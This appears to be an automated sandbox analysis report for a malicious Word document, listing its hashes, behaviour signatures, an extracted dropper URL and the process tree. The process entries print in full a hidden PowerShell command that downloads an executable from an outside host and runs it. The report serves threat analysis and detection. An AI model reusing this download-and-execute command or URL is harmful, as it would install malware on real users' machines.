Analysis
-
max time kernel
137s -
max time network
122s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
13-07-2020 11:40
General
-
Target
PRIZOVKA_SL.doc
-
Size
54KB
-
MD5
a333fc51570e37262cb4d03305bfb591
-
SHA1
f6e9b39410615ebc9f633f2aa803c48118a02e0b
-
SHA256
ad55de0ba082e1d0ba31f608e222d5dc9bae470bbc427b21801a37aab7309aa9
-
SHA512
26124376a5fb52b6bb63c3947a3635f4e19b479ff987f215d6e87d062706f06715ec076c9fe411c6ec0ff24b7835bd1b4eb60f2f8b1616f0a1228ff65518effb
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://fgs.elpadrino.xyz:2095/lado/4.exe
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of WriteProcessMemory 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of SetWindowsHookEx 16 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Blacklisted process makes network request 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PRIZOVKA_SL.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/4.exe',$env:Temp+'\dksll.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dksll.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/4.exe',$env:Temp+'\dksll.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dksll.exe')3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1068-1-0x0000000000000000-mapping.dmp
-
memory/1528-2-0x0000000000000000-mapping.dmp